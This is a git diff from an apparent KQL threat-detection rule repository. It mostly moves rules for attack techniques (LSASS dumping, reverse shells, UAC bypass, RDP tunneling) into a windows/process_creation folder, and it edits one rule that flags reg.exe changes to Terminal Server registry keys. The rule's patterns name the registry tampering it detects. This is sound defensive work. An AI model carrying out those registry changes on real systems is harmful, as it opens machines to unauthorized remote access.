b/KQL/rules/windows/process_creation/potential_download_upload_activity_using_type_command.kql similarity index 100% rename from KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql rename to KQL/rules/windows/process_creation/potential_download_upload_activity_using_type_command.kql diff --git a/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql b/KQL/rules/windows/process_creation/potential_dropper_script_execution_via_wscript_cscript.kql similarity index 100% rename from KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql rename to KQL/rules/windows/process_creation/potential_dropper_script_execution_via_wscript_cscript.kql diff --git a/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql b/KQL/rules/windows/process_creation/potential_encoded_powershell_patterns_in_commandline.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql rename to KQL/rules/windows/process_creation/potential_encoded_powershell_patterns_in_commandline.kql diff --git a/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql b/KQL/rules/windows/process_creation/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql similarity index 100% rename from KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql rename to KQL/rules/windows/process_creation/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql diff --git a/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql b/KQL/rules/windows/process_creation/potential_execution_of_sysinternals_tools.kql similarity index 100% rename from KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql rename to KQL/rules/windows/process_creation/potential_execution_of_sysinternals_tools.kql diff --git a/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql b/KQL/rules/windows/process_creation/potential_fake_instance_of_hxtsr_exe_executed.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql rename to KQL/rules/windows/process_creation/potential_fake_instance_of_hxtsr_exe_executed.kql diff --git a/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql b/KQL/rules/windows/process_creation/potential_file_download_via_ms_appinstaller_protocol_handler.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql rename to KQL/rules/windows/process_creation/potential_file_download_via_ms_appinstaller_protocol_handler.kql diff --git a/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql b/KQL/rules/windows/process_creation/potential_file_overwrite_via_sysinternals_sdelete.kql similarity index 100% rename from KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql rename to KQL/rules/windows/process_creation/potential_file_overwrite_via_sysinternals_sdelete.kql diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql b/KQL/rules/windows/process_creation/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql rename to KQL/rules/windows/process_creation/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql b/KQL/rules/windows/process_creation/potential_homoglyph_attack_using_lookalike_characters.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql rename to KQL/rules/windows/process_creation/potential_homoglyph_attack_using_lookalike_characters.kql diff --git a/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql b/KQL/rules/windows/process_creation/potential_lateral_movement_via_windows_remote_shell.kql similarity index 100% rename from KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql rename to KQL/rules/windows/process_creation/potential_lateral_movement_via_windows_remote_shell.kql diff --git a/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql b/KQL/rules/windows/process_creation/potential_lethalhta_technique_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql rename to KQL/rules/windows/process_creation/potential_lethalhta_technique_execution.kql diff --git a/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql b/KQL/rules/windows/process_creation/potential_lsass_process_dump_via_procdump.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql rename to KQL/rules/windows/process_creation/potential_lsass_process_dump_via_procdump.kql diff --git a/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql b/KQL/rules/windows/process_creation/potential_manage_bde_wsf_abuse_to_proxy_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql rename to KQL/rules/windows/process_creation/potential_manage_bde_wsf_abuse_to_proxy_execution.kql diff --git a/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql b/KQL/rules/windows/process_creation/potential_memory_dumping_activity_via_livekd.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql rename to KQL/rules/windows/process_creation/potential_memory_dumping_activity_via_livekd.kql diff --git a/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql b/KQL/rules/windows/process_creation/potential_meterpreter_cobaltstrike_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql rename to KQL/rules/windows/process_creation/potential_meterpreter_cobaltstrike_activity.kql diff --git a/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql b/KQL/rules/windows/process_creation/potential_mftrace_exe_abuse.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql rename to KQL/rules/windows/process_creation/potential_mftrace_exe_abuse.kql diff --git a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql b/KQL/rules/windows/process_creation/potential_mpclient_dll_sideloading_via_defender_binaries.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql rename to KQL/rules/windows/process_creation/potential_mpclient_dll_sideloading_via_defender_binaries.kql diff --git a/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql b/KQL/rules/windows/process_creation/potential_msiexec_masquerading.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql rename to KQL/rules/windows/process_creation/potential_msiexec_masquerading.kql diff --git a/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql b/KQL/rules/windows/process_creation/potential_mstsc_shadowing_activity.kql similarity index 100% rename from KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql rename to KQL/rules/windows/process_creation/potential_mstsc_shadowing_activity.kql diff --git a/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql b/KQL/rules/windows/process_creation/potential_network_sniffing_activity_using_network_tools.kql similarity index 100% rename from KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql rename to KQL/rules/windows/process_creation/potential_network_sniffing_activity_using_network_tools.kql diff --git a/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql b/KQL/rules/windows/process_creation/potential_ntlm_coercion_via_certutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql rename to KQL/rules/windows/process_creation/potential_ntlm_coercion_via_certutil_exe.kql diff --git a/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql b/KQL/rules/windows/process_creation/potential_obfuscated_ordinal_call_via_rundll32.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql rename to KQL/rules/windows/process_creation/potential_obfuscated_ordinal_call_via_rundll32.kql diff --git a/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql b/KQL/rules/windows/process_creation/potential_password_spraying_attempt_using_dsacls_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql rename to KQL/rules/windows/process_creation/potential_password_spraying_attempt_using_dsacls_exe.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql b/KQL/rules/windows/process_creation/potential_persistence_attempt_via_existing_service_tampering.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql rename to KQL/rules/windows/process_creation/potential_persistence_attempt_via_existing_service_tampering.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql b/KQL/rules/windows/process_creation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql rename to KQL/rules/windows/process_creation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql b/KQL/rules/windows/process_creation/potential_persistence_via_logon_scripts_commandline.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql rename to KQL/rules/windows/process_creation/potential_persistence_via_logon_scripts_commandline.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql b/KQL/rules/windows/process_creation/potential_persistence_via_microsoft_compatibility_appraiser.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql rename to KQL/rules/windows/process_creation/potential_persistence_via_microsoft_compatibility_appraiser.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql b/KQL/rules/windows/process_creation/potential_persistence_via_netsh_helper_dll.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql rename to KQL/rules/windows/process_creation/potential_persistence_via_netsh_helper_dll.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql b/KQL/rules/windows/process_creation/potential_persistence_via_powershell_search_order_hijacking_task.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql rename to KQL/rules/windows/process_creation/potential_persistence_via_powershell_search_order_hijacking_task.kql diff --git a/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/windows/process_creation/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql similarity index 100% rename from KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql rename to KQL/rules/windows/process_creation/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql diff --git a/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql b/KQL/rules/windows/process_creation/potential_powershell_command_line_obfuscation.kql similarity index 100% rename from KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql rename to KQL/rules/windows/process_creation/potential_powershell_command_line_obfuscation.kql diff --git a/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql b/KQL/rules/windows/process_creation/potential_powershell_console_history_access_attempt_via_history_file.kql similarity index 100% rename from KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql rename to KQL/rules/windows/process_creation/potential_powershell_console_history_access_attempt_via_history_file.kql diff --git a/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql b/KQL/rules/windows/process_creation/potential_powershell_downgrade_attack.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql rename to KQL/rules/windows/process_creation/potential_powershell_downgrade_attack.kql diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql b/KQL/rules/windows/process_creation/potential_powershell_execution_policy_tampering_proccreation.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql rename to KQL/rules/windows/process_creation/potential_powershell_execution_policy_tampering_proccreation.kql diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql b/KQL/rules/windows/process_creation/potential_powershell_execution_via_dll.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql rename to KQL/rules/windows/process_creation/potential_powershell_execution_via_dll.kql diff --git a/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql b/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_reversed_commands.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql rename to KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_reversed_commands.kql diff --git a/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql b/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_wchar_char.kql similarity index 100% rename from KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql rename to KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_wchar_char.kql diff --git a/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql b/KQL/rules/windows/process_creation/potential_powershell_reverseshell_connection.kql similarity index 100% rename from KQL/rules/Execution/potential_powershell_reverseshell_connection.kql rename to KQL/rules/windows/process_creation/potential_powershell_reverseshell_connection.kql diff --git a/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql b/KQL/rules/windows/process_creation/potential_privilege_escalation_to_local_system.kql similarity index 100% rename from KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql rename to KQL/rules/windows/process_creation/potential_privilege_escalation_to_local_system.kql diff --git a/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql b/KQL/rules/windows/process_creation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql rename to KQL/rules/windows/process_creation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql diff --git a/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql b/KQL/rules/windows/process_creation/potential_privilege_escalation_via_service_permissions_weakness.kql similarity index 100% rename from KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql rename to KQL/rules/windows/process_creation/potential_privilege_escalation_via_service_permissions_weakness.kql diff --git a/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql b/KQL/rules/windows/process_creation/potential_process_execution_proxy_via_cl_invocation_ps1.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql rename to KQL/rules/windows/process_creation/potential_process_execution_proxy_via_cl_invocation_ps1.kql diff --git a/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql b/KQL/rules/windows/process_creation/potential_process_injection_via_msra_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql rename to KQL/rules/windows/process_creation/potential_process_injection_via_msra_exe.kql diff --git a/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_product_class_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/potential_product_class_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_product_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/potential_product_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql b/KQL/rules/windows/process_creation/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql rename to KQL/rules/windows/process_creation/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql diff --git a/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql b/KQL/rules/windows/process_creation/potential_provlaunch_exe_binary_proxy_execution_abuse.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql rename to KQL/rules/windows/process_creation/potential_provlaunch_exe_binary_proxy_execution_abuse.kql diff --git a/KQL/rules/Resource Development/potential_psexec_remote_execution.kql b/KQL/rules/windows/process_creation/potential_psexec_remote_execution.kql similarity index 100% rename from KQL/rules/Resource Development/potential_psexec_remote_execution.kql rename to KQL/rules/windows/process_creation/potential_psexec_remote_execution.kql diff --git a/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql b/KQL/rules/windows/process_creation/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql rename to KQL/rules/windows/process_creation/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql diff --git a/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql b/KQL/rules/windows/process_creation/potential_rdp_session_hijacking_activity.kql similarity index 100% rename from KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql rename to KQL/rules/windows/process_creation/potential_rdp_session_hijacking_activity.kql diff --git a/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql b/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_plink.kql similarity index 100% rename from KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql rename to KQL/rules/windows/process_creation/potential_rdp_tunneling_via_plink.kql diff --git a/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql b/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_ssh.kql similarity index 100% rename from KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql rename to KQL/rules/windows/process_creation/potential_rdp_tunneling_via_ssh.kql diff --git a/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql b/KQL/rules/windows/process_creation/potential_recon_activity_using_driverquery_exe.kql similarity index 100% rename from KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql rename to KQL/rules/windows/process_creation/potential_recon_activity_using_driverquery_exe.kql diff --git a/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql b/KQL/rules/windows/process_creation/potential_recon_activity_via_nltest_exe.kql similarity index 100% rename from KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql rename to KQL/rules/windows/process_creation/potential_recon_activity_via_nltest_exe.kql diff --git a/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/windows/process_creation/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql similarity index 100% rename from KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql rename to KQL/rules/windows/process_creation/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql diff --git a/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql b/KQL/rules/windows/process_creation/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql similarity index 100% rename from KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql rename to KQL/rules/windows/process_creation/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql diff --git a/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql b/KQL/rules/windows/process_creation/potential_reflectdebugger_content_execution_via_werfault_exe.kql similarity index 100% rename from KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql rename to KQL/rules/windows/process_creation/potential_reflectdebugger_content_execution_via_werfault_exe.kql diff --git a/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql b/KQL/rules/windows/process_creation/potential_register_app_vbs_lolscript_abuse.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql rename to KQL/rules/windows/process_creation/potential_register_app_vbs_lolscript_abuse.kql diff --git a/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql b/KQL/rules/windows/process_creation/potential_regsvr32_commandline_flag_anomaly.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql rename to KQL/rules/windows/process_creation/potential_regsvr32_commandline_flag_anomaly.kql diff --git a/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql b/KQL/rules/windows/process_creation/potential_remote_desktop_tunneling.kql similarity index 100% rename from KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql rename to KQL/rules/windows/process_creation/potential_remote_desktop_tunneling.kql diff --git a/KQL/rules/Execution/potential_renamed_rundll32_execution.kql b/KQL/rules/windows/process_creation/potential_renamed_rundll32_execution.kql similarity index 100% rename from KQL/rules/Execution/potential_renamed_rundll32_execution.kql rename to KQL/rules/windows/process_creation/potential_renamed_rundll32_execution.kql diff --git a/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql b/KQL/rules/windows/process_creation/potential_rundll32_execution_with_dll_stored_in_ads.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql rename to KQL/rules/windows/process_creation/potential_rundll32_execution_with_dll_stored_in_ads.kql diff --git a/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql b/KQL/rules/windows/process_creation/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql rename to KQL/rules/windows/process_creation/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql diff --git a/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql b/KQL/rules/windows/process_creation/potential_shelldispatch_dll_functionality_abuse.kql similarity index 100% rename from KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql rename to KQL/rules/windows/process_creation/potential_shelldispatch_dll_functionality_abuse.kql diff --git a/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql b/KQL/rules/windows/process_creation/potential_shim_database_persistence_via_sdbinst_exe.kql similarity index 100% rename from KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql rename to KQL/rules/windows/process_creation/potential_shim_database_persistence_via_sdbinst_exe.kql diff --git a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql b/KQL/rules/windows/process_creation/potential_signing_bypass_via_windows_developer_features.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql rename to KQL/rules/windows/process_creation/potential_signing_bypass_via_windows_developer_features.kql diff --git a/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql b/KQL/rules/windows/process_creation/potential_smb_relay_attack_tool_execution.kql similarity index 100% rename from KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql rename to KQL/rules/windows/process_creation/potential_smb_relay_attack_tool_execution.kql diff --git a/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql b/KQL/rules/windows/process_creation/potential_spn_enumeration_via_setspn_exe.kql similarity index 100% rename from KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql rename to KQL/rules/windows/process_creation/potential_spn_enumeration_via_setspn_exe.kql diff --git a/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql b/KQL/rules/windows/process_creation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql rename to KQL/rules/windows/process_creation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql diff --git a/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql b/KQL/rules/windows/process_creation/potential_suspicious_activity_using_secedit.kql similarity index 100% rename from KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql rename to KQL/rules/windows/process_creation/potential_suspicious_activity_using_secedit.kql diff --git a/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql b/KQL/rules/windows/process_creation/potential_suspicious_browser_launch_from_document_reader_process.kql similarity index 100% rename from KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql rename to KQL/rules/windows/process_creation/potential_suspicious_browser_launch_from_document_reader_process.kql diff --git a/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql b/KQL/rules/windows/process_creation/potential_suspicious_mofcomp_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql rename to KQL/rules/windows/process_creation/potential_suspicious_mofcomp_execution.kql diff --git a/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql b/KQL/rules/windows/process_creation/potential_suspicious_registry_file_imported_via_reg_exe.kql similarity index 100% rename from KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql rename to KQL/rules/windows/process_creation/potential_suspicious_registry_file_imported_via_reg_exe.kql diff --git a/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql b/KQL/rules/windows/process_creation/potential_suspicious_windows_feature_enabled_proccreation.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql rename to KQL/rules/windows/process_creation/potential_suspicious_windows_feature_enabled_proccreation.kql diff --git a/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql b/KQL/rules/windows/process_creation/potential_sysinternals_procdump_evasion.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql rename to KQL/rules/windows/process_creation/potential_sysinternals_procdump_evasion.kql diff --git a/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql b/KQL/rules/windows/process_creation/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql similarity index 55% rename from KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql rename to KQL/rules/windows/process_creation/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql index e5791364..5c771af8 100644 --- a/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql +++ b/KQL/rules/windows/process_creation/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql @@ -7,4 +7,4 @@ // Tags: attack.persistence, attack.defense-evasion, attack.lateral-movement, attack.t1021.001, attack.t1112 DeviceProcessEvents -| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "WinStations\\RDP-Tcp" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "fDenyTSConnections")) \ No newline at end of file +| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fDenyTSConnections" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "SecurityLayer" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "WinStations\\RDP-Tcp")) and (not((ProcessCommandLine contains "SecurityLayer" and ProcessCommandLine contains "02"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql b/KQL/rules/windows/process_creation/potential_tampering_with_security_products_via_wmic.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql rename to KQL/rules/windows/process_creation/potential_tampering_with_security_products_via_wmic.kql diff --git a/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql b/KQL/rules/windows/process_creation/potential_uac_bypass_via_sdclt_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql rename to KQL/rules/windows/process_creation/potential_uac_bypass_via_sdclt_exe.kql diff --git a/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql diff --git 